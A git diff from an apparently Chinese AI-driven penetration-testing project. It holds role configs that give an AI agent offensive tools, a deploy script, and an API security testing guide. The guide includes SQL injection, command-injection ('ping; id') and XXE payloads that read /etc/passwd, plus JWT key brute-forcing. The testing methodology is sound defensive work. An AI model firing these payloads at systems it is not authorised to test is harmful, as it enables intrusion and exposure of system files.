icon: "\U0001F575"
|
||||
tools:
|
||||
- linpeas
|
||||
- winpeas
|
||||
- mimikatz
|
||||
- bloodhound
|
||||
- impacket
|
||||
- responder
|
||||
- netexec
|
||||
- rpcclient
|
||||
- smbmap
|
||||
- enum4linux
|
||||
- enum4linux-ng
|
||||
- exec
|
||||
- execute-python-script
|
||||
- install-python-package
|
||||
- record_vulnerability
|
||||
- list_knowledge_risk_types
|
||||
- search_knowledge_base
|
||||
- list_skills
|
||||
- read_skill
|
||||
enabled: true
|
||||
@@ -0,0 +1,20 @@
|
||||
name: 容器安全
|
||||
description: 容器与Kubernetes安全专家,容器环境安全检测
|
||||
user_prompt: 你是一个专业的容器与Kubernetes安全专家。请使用专业的容器安全工具对Docker容器和Kubernetes集群进行全面的安全检测,包括镜像漏洞扫描、配置检查、运行时安全等工作。
|
||||
icon: "\U0001F6E1"
|
||||
tools:
|
||||
- trivy
|
||||
- clair
|
||||
- docker-bench-security
|
||||
- kube-bench
|
||||
- kube-hunter
|
||||
- falco
|
||||
- exec
|
||||
- execute-python-script
|
||||
- install-python-package
|
||||
- record_vulnerability
|
||||
- list_knowledge_risk_types
|
||||
- search_knowledge_base
|
||||
- list_skills
|
||||
- read_skill
|
||||
enabled: true
|
||||
@@ -0,0 +1,26 @@
|
||||
name: 数字取证
|
||||
description: 数字取证与隐写分析专家,文件与内存取证
|
||||
user_prompt: 你是一个专业的数字取证与隐写分析专家。请使用专业的取证工具对文件、磁盘镜像、内存转储进行分析,提取证据信息。同时擅长隐写分析、数据恢复、元数据提取等技术。
|
||||
icon: "\U0001F50E"
|
||||
tools:
|
||||
- volatility
|
||||
- volatility3
|
||||
- foremost
|
||||
- steghide
|
||||
- stegsolve
|
||||
- zsteg
|
||||
- exiftool
|
||||
- binwalk
|
||||
- strings
|
||||
- xxd
|
||||
- fcrackzip
|
||||
- pdfcrack
|
||||
- exec
|
||||
- execute-python-script
|
||||
- install-python-package
|
||||
- record_vulnerability
|
||||
- list_knowledge_risk_types
|
||||
- search_knowledge_base
|
||||
- list_skills
|
||||
- read_skill
|
||||
enabled: true
|
||||
@@ -0,0 +1,35 @@
|
||||
name: 渗透测试
|
||||
description: 专业渗透测试专家,全面深入的漏洞检测
|
||||
user_prompt: 你是一个专业的网络安全渗透测试专家。请使用专业的渗透测试方法和工具,对目标进行全面的安全测试,包括但不限于SQL注入、XSS、CSRF、文件包含、命令执行等常见漏洞。
|
||||
icon: "\U0001F3AF"
|
||||
tools:
|
||||
- http-framework-test
|
||||
- httpx
|
||||
- amass
|
||||
- anew
|
||||
- angr
|
||||
- api-fuzzer
|
||||
- api-schema-analyzer
|
||||
- arjun
|
||||
- arp-scan
|
||||
- autorecon
|
||||
- binwalk
|
||||
- bloodhound
|
||||
- burpsuite
|
||||
- cat
|
||||
- checkov
|
||||
- checksec
|
||||
- cloudmapper
|
||||
- create-file
|
||||
- cyberchef
|
||||
- dalfox
|
||||
- delete-file
|
||||
- exec
|
||||
- execute-python-script
|
||||
- install-python-package
|
||||
- record_vulnerability
|
||||
- list_knowledge_risk_types
|
||||
- search_knowledge_base
|
||||
- list_skills
|
||||
- read_skill
|
||||
enabled: true
|
||||
@@ -0,0 +1,25 @@
|
||||
name: 综合漏洞扫描
|
||||
description: 综合漏洞扫描专家,多类型漏洞检测
|
||||
user_prompt: 你是一个专业的综合漏洞扫描专家。请使用各种漏洞扫描工具对目标进行全面的安全检测,包括Web漏洞、网络服务漏洞、配置缺陷等多种类型的漏洞识别和分析。
|
||||
icon: ⚠
|
||||
tools:
|
||||
- nuclei
|
||||
- nikto
|
||||
- sqlmap
|
||||
- nmap
|
||||
- masscan
|
||||
- rustscan
|
||||
- wafw00f
|
||||
- dalfox
|
||||
- xsser
|
||||
- jaeles
|
||||
- httpx
|
||||
- http-framework-test
|
||||
- execute-python-script
|
||||
- install-python-package
|
||||
- record_vulnerability
|
||||
- list_knowledge_risk_types
|
||||
- search_knowledge_base
|
||||
- list_skills
|
||||
- read_skill
|
||||
enabled: true
|
||||
@@ -0,0 +1,5 @@
|
||||
name: 默认
|
||||
description: 默认角色,不额外携带用户提示词,使用默认MCP
|
||||
user_prompt: ""
|
||||
icon: "\U0001F535"
|
||||
enabled: true
|
||||
@@ -2,59 +2,388 @@
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
# CyberStrikeAI 启动脚本
|
||||
# CyberStrikeAI 一键部署启动脚本
|
||||
ROOT_DIR="$(cd "$(dirname "$0")" && pwd)"
|
||||
cd "$ROOT_DIR"
|
||||
|
||||
echo "🚀 启动 CyberStrikeAI..."
|
||||
# 颜色定义
|
||||
RED='\033[0;31m'
|
||||
GREEN='\033[0;32m'
|
||||
YELLOW='\033[1;33m'
|
||||
BLUE='\033[0;34m'
|
||||
CYAN='\033[0;36m'
|
||||
NC='\033[0m' # No Color
|
||||
|
||||
# 打印带颜色的消息
|
||||
info() { echo -e "${BLUE}ℹ️ $1${NC}"; }
|
||||
success() { echo -e "${GREEN}✅ $1${NC}"; }
|
||||
warning() { echo -e "${YELLOW}⚠️ $1${NC}"; }
|
||||
error() { echo -e "${RED}❌ $1${NC}"; }
|
||||
note() { echo -e "${CYAN}ℹ️ $1${NC}"; }
|
||||
|
||||
# 临时源配置(仅在此脚本中生效)
|
||||
PIP_INDEX_URL="${PIP_INDEX_URL:-https://pypi.tuna.tsinghua.edu.cn/simple}"
|
||||
GOPROXY="${GOPROXY:-https://goproxy.cn,direct}"
|
||||
|
||||
# 保存原始环境变量(用于恢复)
|
||||
ORIGINAL_PIP_INDEX_URL="${PIP_INDEX_URL:-}"
|
||||
ORIGINAL_GOPROXY="${GOPROXY:-}"
|
||||
|
||||
# 进度显示函数
|
||||
show_progress() {
|
||||
local pid=$1
|
||||
local message=$2
|
||||
local i=0
|
||||
local dots=""
|
||||
|
||||
# 检查进程是否存在
|
||||
if ! kill -0 "$pid" 2>/dev/null; then
|
||||
# 进程已经结束,立即返回
|
||||
return 0
|
||||
fi
|
||||
|
||||
while kill -0 "$pid" 2>/dev/null; do
|
||||
i=$((i + 1))
|
||||
case $((i % 4)) in
|
||||
0) dots="." ;;
|
||||
1) dots=".." ;;
|
||||
2) dots="..." ;;
|
||||
3) dots="...." ;;
|
||||
esac
|
||||
printf "\r${BLUE}⏳ %s%s${NC}" "$message" "$dots"
|
||||
sleep 0.5
|
||||
|
||||
# 再次检查进程是否还存在
|
||||
if ! kill -0 "$pid" 2>/dev/null; then
|
||||
break
|
||||
fi
|
||||
done
|
||||
printf "\r"
|
||||
}
|
||||
|
||||
echo ""
|
||||
echo "=========================================="
|
||||
echo " CyberStrikeAI 一键部署启动脚本"
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
|
||||
# 显示临时源配置信息
|
||||
echo ""
|
||||
warning "⚠️ 注意:此脚本将使用临时镜像源加速下载"
|
||||
echo ""
|
||||
info "Python pip 临时镜像源:"
|
||||
echo " ${PIP_INDEX_URL}"
|
||||
info "Go Proxy 临时镜像源:"
|
||||
echo " ${GOPROXY}"
|
||||
echo ""
|
||||
note "这些设置仅在脚本运行期间生效,不会修改系统配置"
|
||||
echo ""
|
||||
sleep 1
|
||||
|
||||
CONFIG_FILE="$ROOT_DIR/config.yaml"
|
||||
VENV_DIR="$ROOT_DIR/venv"
|
||||
REQUIREMENTS_FILE="$ROOT_DIR/requirements.txt"
|
||||
BINARY_NAME="cyberstrike-ai"
|
||||
|
||||
# 检查配置文件
|
||||
if [ ! -f "$CONFIG_FILE" ]; then
|
||||
echo "❌ 配置文件 config.yaml 不存在"
|
||||
error "配置文件 config.yaml 不存在"
|
||||
info "请确保在项目根目录运行此脚本"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# 检查 Python 环境
|
||||
if ! command -v python3 >/dev/null 2>&1; then
|
||||
echo "❌ 未找到 python3,请先安装 Python 3.10+"
|
||||
exit 1
|
||||
fi
|
||||
# 检查并安装 Python 环境
|
||||
check_python() {
|
||||
if ! command -v python3 >/dev/null 2>&1; then
|
||||
error "未找到 python3"
|
||||
echo ""
|
||||
info "请先安装 Python 3.10 或更高版本:"
|
||||
echo " macOS: brew install python3"
|
||||
echo " Ubuntu: sudo apt-get install python3 python3-venv"
|
||||
echo " CentOS: sudo yum install python3 python3-pip"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
PYTHON_VERSION=$(python3 --version 2>&1 | awk '{print $2}')
|
||||
PYTHON_MAJOR=$(echo "$PYTHON_VERSION" | cut -d. -f1)
|
||||
PYTHON_MINOR=$(echo "$PYTHON_VERSION" | cut -d. -f2)
|
||||
|
||||
if [ "$PYTHON_MAJOR" -lt 3 ] || ([ "$PYTHON_MAJOR" -eq 3 ] && [ "$PYTHON_MINOR" -lt 10 ]); then
|
||||
error "Python 版本过低: $PYTHON_VERSION (需要 3.10+)"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
success "Python 环境检查通过: $PYTHON_VERSION"
|
||||
}
|
||||
|
||||
# 创建并激活虚拟环境
|
||||
if [ ! -d "$VENV_DIR" ]; then
|
||||
echo "🐍 创建 Python 虚拟环境..."
|
||||
python3 -m venv "$VENV_DIR"
|
||||
fi
|
||||
# 检查并安装 Go 环境
|
||||
check_go() {
|
||||
if ! command -v go >/dev/null 2>&1; then
|
||||
error "未找到 Go"
|
||||
echo ""
|
||||
info "请先安装 Go 1.21 或更高版本:"
|
||||
echo " macOS: brew install go"
|
||||
echo " Ubuntu: sudo apt-get install golang-go"
|
||||
echo " CentOS: sudo yum install golang"
|
||||
echo " 或访问: https://go.dev/dl/"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
GO_VERSION=$(go version | awk '{print $3}' | sed 's/go//')
|
||||
GO_MAJOR=$(echo "$GO_VERSION" | cut -d. -f1)
|
||||
GO_MINOR=$(echo "$GO_VERSION" | cut -d. -f2)
|
||||
|
||||
if [ "$GO_MAJOR" -lt 1 ] || ([ "$GO_MAJOR" -eq 1 ] && [ "$GO_MINOR" -lt 21 ]); then
|
||||
error "Go 版本过低: $GO_VERSION (需要 1.21+)"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
success "Go 环境检查通过: $(go version)"
|
||||
}
|
||||
|
||||
echo "🐍 激活虚拟环境..."
|
||||
# shellcheck disable=SC1091
|
||||
source "$VENV_DIR/bin/activate"
|
||||
# 设置 Python 虚拟环境
|
||||
setup_python_env() {
|
||||
if [ ! -d "$VENV_DIR" ]; then
|
||||
info "创建 Python 虚拟环境..."
|
||||
python3 -m venv "$VENV_DIR"
|
||||
success "虚拟环境创建完成"
|
||||
else
|
||||
info "Python 虚拟环境已存在"
|
||||
fi
|
||||
|
||||
info "激活虚拟环境..."
|
||||
# shellcheck disable=SC1091
|
||||
source "$VENV_DIR/bin/activate"
|
||||
|
||||
if [ -f "$REQUIREMENTS_FILE" ]; then
|
||||
echo ""
|
||||
note "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
|
||||
note "⚠️ 使用临时 pip 镜像源(仅本次脚本运行有效)"
|
||||
note " 镜像地址: ${PIP_INDEX_URL}"
|
||||
note " 如需永久配置,请设置环境变量 PIP_INDEX_URL"
|
||||
note "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
|
||||
echo ""
|
||||
|
||||
info "升级 pip..."
|
||||
pip install --index-url "$PIP_INDEX_URL" --upgrade pip >/dev/null 2>&1 || true
|
||||
|
||||
info "安装 Python 依赖包..."
|
||||
echo ""
|
||||
|
||||
# 尝试安装依赖,捕获错误输出并显示进度
|
||||
PIP_LOG=$(mktemp)
|
||||
(
|
||||
set +e # 在子shell中禁用错误退出
|
||||
pip install --index-url "$PIP_INDEX_URL" -r "$REQUIREMENTS_FILE" >"$PIP_LOG" 2>&1
|
||||
echo $? > "${PIP_LOG}.exit"
|
||||
) &
|
||||
PIP_PID=$!
|
||||
|
||||
# 等待一小段时间,确保进程启动
|
||||
sleep 0.1
|
||||
|
||||
# 显示进度(如果进程还在运行)
|
||||
if kill -0 "$PIP_PID" 2>/dev/null; then
|
||||
show_progress "$PIP_PID" "正在安装依赖包"
|
||||
else
|
||||
# 进程已经结束,等待一下确保退出码文件已写入
|
||||
sleep 0.2
|
||||
fi
|
||||
|
||||
# 等待进程完成,忽略 wait 的退出码
|
||||
wait "$PIP_PID" 2>/dev/null || true
|
||||
|
||||
PIP_EXIT_CODE=0
|
||||
if [ -f "${PIP_LOG}.exit" ]; then
|
||||
PIP_EXIT_CODE=$(cat "${PIP_LOG}.exit" 2>/dev/null || echo "1")
|
||||
rm -f "${PIP_LOG}.exit" 2>/dev/null || true
|
||||
else
|
||||
# 如果没有退出码文件,检查日志中是否有错误
|
||||
if [ -f "$PIP_LOG" ] && grep -q -i "error\|failed\|exception" "$PIP_LOG" 2>/dev/null; then
|
||||
PIP_EXIT_CODE=1
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ $PIP_EXIT_CODE -eq 0 ]; then
|
||||
success "Python 依赖安装完成"
|
||||
else
|
||||
# 检查是否是 angr 安装失败(需要 Rust)
|
||||
if grep -q "angr" "$PIP_LOG" && grep -q "Rust compiler\|can't find Rust" "$PIP_LOG"; then
|
||||
warning "angr 安装失败(需要 Rust 编译器)"
|
||||
echo ""
|
||||
info "angr 是可选依赖,主要用于二进制分析工具"
|
||||
info "如果需要使用 angr,请先安装 Rust:"
|
||||
echo " macOS: curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh"
|
||||
echo " Ubuntu: curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh"
|
||||
echo " 或访问: https://rustup.rs/"
|
||||
echo ""
|
||||
info "其他依赖已安装,可以继续使用(部分工具可能不可用)"
|
||||
else
|
||||
warning "部分 Python 依赖安装失败,但可以继续尝试运行"
|
||||
warning "如果遇到问题,请检查错误信息并手动安装缺失的依赖"
|
||||
# 显示最后几行错误信息
|
||||
echo ""
|
||||
info "错误详情(最后 10 行):"
|
||||
tail -n 10 "$PIP_LOG" | sed 's/^/ /'
|
||||
echo ""
|
||||
fi
|
||||
fi
|
||||
rm -f "$PIP_LOG"
|
||||
else
|
||||
warning "未找到 requirements.txt,跳过 Python 依赖安装"
|
||||
fi
|
||||
}
|
||||
|
||||
if [ -f "$REQUIREMENTS_FILE" ]; then
|
||||
echo "📦 安装/更新 Python 依赖..."
|
||||
pip install -r "$REQUIREMENTS_FILE"
|
||||
else
|
||||
echo "⚠️ 未找到 requirements.txt,跳过 Python 依赖安装"
|
||||
fi
|
||||
# 构建 Go 项目
|
||||
build_go_project() {
|
||||
echo ""
|
||||
note "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
|
||||
note "⚠️ 使用临时 Go Proxy(仅本次脚本运行有效)"
|
||||
note " Proxy 地址: ${GOPROXY}"
|
||||
note " 如需永久配置,请设置环境变量 GOPROXY"
|
||||
note "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━"
|
||||
echo ""
|
||||
|
||||
info "下载 Go 依赖..."
|
||||
GO_DOWNLOAD_LOG=$(mktemp)
|
||||
(
|
||||
set +e # 在子shell中禁用错误退出
|
||||
export GOPROXY="$GOPROXY"
|
||||
go mod download >"$GO_DOWNLOAD_LOG" 2>&1
|
||||
echo $? > "${GO_DOWNLOAD_LOG}.exit"
|
||||
) &
|
||||
GO_DOWNLOAD_PID=$!
|
||||
|
||||
# 等待一小段时间,确保进程启动
|
||||
sleep 0.1
|
||||
|
||||
# 显示进度(如果进程还在运行)
|
||||
if kill -0 "$GO_DOWNLOAD_PID" 2>/dev/null; then
|
||||
show_progress "$GO_DOWNLOAD_PID" "正在下载 Go 依赖"
|
||||
else
|
||||
# 进程已经结束,等待一下确保退出码文件已写入
|
||||
sleep 0.2
|
||||
fi
|
||||
|
||||
# 等待进程完成,忽略 wait 的退出码
|
||||
wait "$GO_DOWNLOAD_PID" 2>/dev/null || true
|
||||
|
||||
GO_DOWNLOAD_EXIT_CODE=0
|
||||
if [ -f "${GO_DOWNLOAD_LOG}.exit" ]; then
|
||||
GO_DOWNLOAD_EXIT_CODE=$(cat "${GO_DOWNLOAD_LOG}.exit" 2>/dev/null || echo "1")
|
||||
rm -f "${GO_DOWNLOAD_LOG}.exit" 2>/dev/null || true
|
||||
else
|
||||
# 如果没有退出码文件,检查日志中是否有错误
|
||||
if [ -f "$GO_DOWNLOAD_LOG" ] && grep -q -i "error\|failed" "$GO_DOWNLOAD_LOG" 2>/dev/null; then
|
||||
GO_DOWNLOAD_EXIT_CODE=1
|
||||
fi
|
||||
fi
|
||||
rm -f "$GO_DOWNLOAD_LOG" 2>/dev/null || true
|
||||
|
||||
if [ $GO_DOWNLOAD_EXIT_CODE -ne 0 ]; then
|
||||
error "Go 依赖下载失败"
|
||||
exit 1
|
||||
fi
|
||||
success "Go 依赖下载完成"
|
||||
|
||||
info "构建项目..."
|
||||
GO_BUILD_LOG=$(mktemp)
|
||||
(
|
||||
set +e # 在子shell中禁用错误退出
|
||||
export GOPROXY="$GOPROXY"
|
||||
go build -o "$BINARY_NAME" cmd/server/main.go >"$GO_BUILD_LOG" 2>&1
|
||||
echo $? > "${GO_BUILD_LOG}.exit"
|
||||
) &
|
||||
GO_BUILD_PID=$!
|
||||
|
||||
# 等待一小段时间,确保进程启动
|
||||
sleep 0.1
|
||||
|
||||
# 显示进度(如果进程还在运行)
|
||||
if kill -0 "$GO_BUILD_PID" 2>/dev/null; then
|
||||
show_progress "$GO_BUILD_PID" "正在构建项目"
|
||||
else
|
||||
# 进程已经结束,等待一下确保退出码文件已写入
|
||||
sleep 0.2
|
||||
fi
|
||||
|
||||
# 等待进程完成,忽略 wait 的退出码
|
||||
wait "$GO_BUILD_PID" 2>/dev/null || true
|
||||
|
||||
GO_BUILD_EXIT_CODE=0
|
||||
if [ -f "${GO_BUILD_LOG}.exit" ]; then
|
||||
GO_BUILD_EXIT_CODE=$(cat "${GO_BUILD_LOG}.exit" 2>/dev/null || echo "1")
|
||||
rm -f "${GO_BUILD_LOG}.exit" 2>/dev/null || true
|
||||
else
|
||||
# 如果没有退出码文件,检查日志中是否有错误
|
||||
if [ -f "$GO_BUILD_LOG" ] && grep -q -i "error\|failed" "$GO_BUILD_LOG" 2>/dev/null; then
|
||||
GO_BUILD_EXIT_CODE=1
|
||||
fi
|
||||
fi
|
||||
|
||||
if [ $GO_BUILD_EXIT_CODE -eq 0 ]; then
|
||||
success "项目构建完成: $BINARY_NAME"
|
||||
rm -f "$GO_BUILD_LOG"
|
||||
else
|
||||
error "项目构建失败"
|
||||
# 显示构建错误
|
||||
echo ""
|
||||
info "构建错误详情:"
|
||||
cat "$GO_BUILD_LOG" | sed 's/^/ /'
|
||||
echo ""
|
||||
rm -f "$GO_BUILD_LOG"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
# 检查 Go 环境
|
||||
if ! command -v go >/dev/null 2>&1; then
|
||||
echo "❌ Go 未安装,请先安装 Go 1.21 或更高版本"
|
||||
exit 1
|
||||
fi
|
||||
# 检查是否需要重新构建
|
||||
need_rebuild() {
|
||||
if [ ! -f "$BINARY_NAME" ]; then
|
||||
return 0 # 需要构建
|
||||
fi
|
||||
|
||||
# 检查源代码是否有更新
|
||||
if [ "$BINARY_NAME" -ot cmd/server/main.go ] || \
|
||||
[ "$BINARY_NAME" -ot go.mod ] || \
|
||||
find internal cmd -name "*.go" -newer "$BINARY_NAME" 2>/dev/null | grep -q .; then
|
||||
return 0 # 需要重新构建
|
||||
fi
|
||||
|
||||
return 1 # 不需要构建
|
||||
}
|
||||
|
||||
# 下载依赖
|
||||
echo "📦 下载 Go 依赖..."
|
||||
go mod download
|
||||
# 主流程
|
||||
main() {
|
||||
# 环境检查
|
||||
info "检查运行环境..."
|
||||
check_python
|
||||
check_go
|
||||
echo ""
|
||||
|
||||
# 设置 Python 环境
|
||||
info "设置 Python 环境..."
|
||||
setup_python_env
|
||||
echo ""
|
||||
|
||||
# 构建 Go 项目
|
||||
if need_rebuild; then
|
||||
info "准备构建项目..."
|
||||
build_go_project
|
||||
else
|
||||
success "可执行文件已是最新,跳过构建"
|
||||
fi
|
||||
echo ""
|
||||
|
||||
# 启动服务器
|
||||
success "所有准备工作完成!"
|
||||
echo ""
|
||||
info "启动 CyberStrikeAI 服务器..."
|
||||
echo "=========================================="
|
||||
echo ""
|
||||
|
||||
# 运行服务器
|
||||
exec "./$BINARY_NAME"
|
||||
}
|
||||
|
||||
# 构建项目
|
||||
echo "🔨 构建项目..."
|
||||
go build -o cyberstrike-ai cmd/server/main.go
|
||||
|
||||
# 运行服务器
|
||||
echo "✅ 启动服务器..."
|
||||
./cyberstrike-ai
|
||||
# 执行主流程
|
||||
main
|
||||
|
||||
@@ -0,0 +1,124 @@
|
||||
# Skills 系统使用指南
|
||||
|
||||
## 概述
|
||||
|
||||
Skills系统允许你为角色配置专业知识和技能文档。当角色执行任务时,系统会将技能名称添加到系统提示词中作为推荐提示,AI智能体可以通过 `read_skill` 工具按需获取技能的详细内容。
|
||||
|
||||
## Skills结构
|
||||
|
||||
每个skill是一个目录,包含一个`SKILL.md`文件:
|
||||
|
||||
```
|
||||
skills/
|
||||
├── sql-injection-testing/
|
||||
│ └── SKILL.md
|
||||
├── xss-testing/
|
||||
│ └── SKILL.md
|
||||
└── ...
|
||||
```
|
||||
|
||||
## SKILL.md格式
|
||||
|
||||
SKILL.md文件支持YAML front matter格式(可选):
|
||||
|
||||
```markdown
|
||||
---
|
||||
name: skill-name
|
||||
description: Skill的简短描述
|
||||
version: 1.0.0
|
||||
---
|
||||
|
||||
# Skill标题
|
||||
|
||||
这里是skill的详细内容,可以包含:
|
||||
- 测试方法
|
||||
- 工具使用
|
||||
- 最佳实践
|
||||
- 示例代码
|
||||
- 等等...
|
||||
```
|
||||
|
||||
如果不使用front matter,整个文件内容都会被作为skill内容。
|
||||
|
||||
## 在角色中配置Skills
|
||||
|
||||
在角色配置文件中添加`skills`字段:
|
||||
|
||||
```yaml
|
||||
name: 渗透测试
|
||||
description: 专业渗透测试专家
|
||||
user_prompt: 你是一个专业的网络安全渗透测试专家...
|
||||
tools:
|
||||
- nmap
|
||||
- sqlmap
|
||||
- burpsuite
|
||||
skills:
|
||||
- sql-injection-testing
|
||||
- xss-testing
|
||||
enabled: true
|
||||
```
|
||||
|
||||
`skills`字段是一个字符串数组,每个字符串是skill目录的名称。
|
||||
|
||||
## 工作原理
|
||||
|
||||
1. **加载阶段**:系统启动时,会扫描`skills_dir`目录下的所有skill目录
|
||||
2. **执行阶段**:当使用某个角色执行任务时:
|
||||
- 系统会将角色配置的skill名称添加到系统提示词中作为推荐提示
|
||||
- **注意**:skill的详细内容不会自动注入到系统提示词中
|
||||
- AI智能体需要根据任务需要,主动调用 `read_skill` 工具获取技能的详细内容
|
||||
3. **按需调用**:AI可以通过以下工具访问skills:
|
||||
- `list_skills`: 获取所有可用的skills列表
|
||||
- `read_skill`: 读取指定skill的详细内容
|
||||
|
||||
这样AI可以在执行任务过程中,根据实际需要自主调用相关skills获取专业知识。即使角色没有配置skills,AI也可以通过这些工具按需访问任何可用的skill。
|
||||
|
||||
## 示例Skills
|
||||
|
||||
### sql-injection-testing
|
||||
|
||||
包含SQL注入测试的专业方法、工具使用、绕过技术等。
|
||||
|
||||
### xss-testing
|
||||
|
||||
包含XSS测试的各种类型、payload、绕过技术等。
|
||||
|
||||
## 创建自定义Skill
|
||||
|
||||
1. 在`skills`目录下创建新目录,例如`my-skill`
|
||||
2. 在该目录下创建`SKILL.md`文件
|
||||
3. 编写skill内容
|
||||
4. 在角色配置中添加该skill名称
|
||||
|
||||
```bash
|
||||
mkdir -p skills/my-skill
|
||||
cat > skills/my-skill/SKILL.md << 'EOF'
|
||||
---
|
||||
name: my-skill
|
||||
description: 我的自定义技能
|
||||
---
|
||||
|
||||
# 我的自定义技能
|
||||
|
||||
这里是技能内容...
|
||||
EOF
|
||||
```
|
||||
|
||||
## 注意事项
|
||||
|
||||
- **重要**:Skill的详细内容不会自动注入到系统提示词中,只有技能名称会作为提示添加
|
||||
- AI智能体需要通过 `read_skill` 工具主动获取技能内容,这样可以节省token并提高灵活性
|
||||
- Skill内容应该清晰、结构化,便于AI理解
|
||||
- 可以包含代码示例、命令示例等
|
||||
- 建议每个skill专注于一个特定领域或技能
|
||||
- 建议在skill的YAML front matter中提供清晰的 `description`,帮助AI判断是否需要读取该skill
|
||||
|
||||
## 配置
|
||||
|
||||
在`config.yaml`中配置skills目录:
|
||||
|
||||
```yaml
|
||||
skills_dir: skills # 相对于配置文件所在目录
|
||||
```
|
||||
|
||||
如果未配置,默认使用`skills`目录。
|
||||
@@ -0,0 +1,287 @@
|
||||
---
|
||||
name: api-security-testing
|
||||
description: API安全测试的专业技能和方法论
|
||||
version: 1.0.0
|
||||
---
|
||||
|
||||
# API安全测试
|
||||
|
||||
## 概述
|
||||
|
||||
API安全测试是确保API接口安全性的重要环节。本技能提供API安全测试的方法、工具和最佳实践。
|
||||
|
||||
## 测试范围
|
||||
|
||||
### 1. 认证和授权
|
||||
|
||||
**测试项目:**
|
||||
- Token有效性验证
|
||||
- Token过期处理
|
||||
- 权限控制
|
||||
- 角色权限验证
|
||||
|
||||
### 2. 输入验证
|
||||
|
||||
**测试项目:**
|
||||
- 参数类型验证
|
||||
- 数据长度限制
|
||||
- 特殊字符处理
|
||||
- SQL注入防护
|
||||
- XSS防护
|
||||
|
||||
### 3. 业务逻辑
|
||||
|
||||
**测试项目:**
|
||||
- 工作流验证
|
||||
- 状态转换
|
||||
- 并发控制
|
||||
- 业务规则
|
||||
|
||||
### 4. 错误处理
|
||||
|
||||
**测试项目:**
|
||||
- 错误信息泄露
|
||||
- 堆栈跟踪
|
||||
- 敏感信息暴露
|
||||
|
||||
## 测试方法
|
||||
|
||||
### 1. API发现
|
||||
|
||||
**识别API端点:**
|
||||
```bash
|
||||
# 使用目录扫描
|
||||
gobuster dir -u https://target.com -w api-wordlist.txt
|
||||
|
||||
# 使用Burp Suite被动扫描
|
||||
# 浏览应用,观察API调用
|
||||
|
||||
# 分析JavaScript文件
|
||||
# 查找API端点定义
|
||||
```
|
||||
|
||||
### 2. 认证测试
|
||||
|
||||
**Token测试:**
|
||||
```http
|
||||
# 测试无效Token
|
||||
GET /api/user
|
||||
Authorization: Bearer invalid_token
|
||||
|
||||
# 测试过期Token
|
||||
GET /api/user
|
||||
Authorization: Bearer expired_token
|
||||
|
||||
# 测试无Token
|
||||
GET /api/user
|
||||
```
|
||||
|
||||
**JWT测试:**
|
||||
```bash
|
||||
# 使用jwt_tool
|
||||
python jwt_tool.py <JWT_TOKEN>
|
||||
|
||||
# 测试算法混淆
|
||||
python jwt_tool.py <JWT_TOKEN> -X a
|
||||
|
||||
# 测试密钥暴力破解
|
||||
python jwt_tool.py <JWT_TOKEN> -C -d wordlist.txt
|
||||
```
|
||||
|
||||
### 3. 授权测试
|
||||
|
||||
**水平权限:**
|
||||
```http
|
||||
# 用户A访问用户B的资源
|
||||
GET /api/user/123
|
||||
Authorization: Bearer user_a_token
|
||||
|
||||
# 应该返回403
|
||||
```
|
||||
|
||||
**垂直权限:**
|
||||
```http
|
||||
# 普通用户访问管理员接口
|
||||
GET /api/admin/users
|
||||
Authorization: Bearer user_token
|
||||
|
||||
# 应该返回403
|
||||
```
|
||||
|
||||
### 4. 输入验证测试
|
||||
|
||||
**SQL注入:**
|
||||
```http
|
||||
POST /api/search
|
||||
{
|
||||
"query": "test' OR '1'='1"
|
||||
}
|
||||
```
|
||||
|
||||
**命令注入:**
|
||||
```http
|
||||
POST /api/execute
|
||||
{
|
||||
"command": "ping; id"
|
||||
}
|
||||
```
|
||||
|
||||
**XXE:**
|
||||
```http
|
||||
POST /api/parse
|
||||
Content-Type: application/xml
|
||||
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
|
||||
<foo>&xxe;</foo>
|
||||
```
|
||||
|
||||
### 5. 速率限制测试
|
||||
|
||||
**测试速率限制:**
|
||||
```python
|
||||
import requests
|
||||
|
||||
for i in range(1000):
|
||||
response = requests.get('https://target.com/api/endpoint')
|
||||
print(f"Request {i}: {response.status_code}")
|
||||
```
|
||||
|
||||
## 工具使用
|
||||
|
||||
### Postman
|
||||
|
||||
**创建测试集合:**
|
||||
1. 导入API文档
|
||||
2. 设置认证
|
||||
3. 创建测试用例
|
||||
4. 运行自动化测试
|
||||
|
||||
### Burp Suite
|
||||
|
||||
**API扫描:**
|
||||
1. 配置API端点
|
||||
2. 设置认证
|
||||
3. 运行主动扫描
|
||||
4. 分析结果
|
||||
|
||||
### OWASP ZAP
|
||||
|
||||
```bash
|
||||
# API扫描
|
||||
zap-cli quick-scan --self-contained \
|
||||
--start-options '-config api.disablekey=true' \
|
||||
http://target.com/api
|
||||
```
|
||||
|
||||
### REST-Attacker
|
||||
|
||||
```bash
|
||||
# 扫描OpenAPI规范
|
||||
rest-attacker scan openapi.yaml
|
||||
```
|
||||
|
||||
## 常见漏洞
|
||||
|
||||
### 1. 认证绕过
|
||||
|
||||
**Token验证缺陷:**
|
||||
- 弱Token生成
|
||||
- Token可预测
|
||||
- Token不验证签名
|
||||
|
||||
### 2. 权限提升
|
||||
|
||||
**IDOR:**
|
||||
- 直接对象引用
|
||||
- 未验证资源所有权
|
||||
|
||||
### 3. 信息泄露
|
||||
|
||||
**错误信息:**
|
||||
- 详细错误信息
|
||||
- 堆栈跟踪
|
||||
- 敏感数据
|
||||
|
||||
### 4. 注入漏洞
|
||||
|
||||
**常见注入:**
|
||||
- SQL注入
|
||||
- NoSQL注入
|
||||
- 命令注入
|
||||
- XXE
|
||||
|
||||
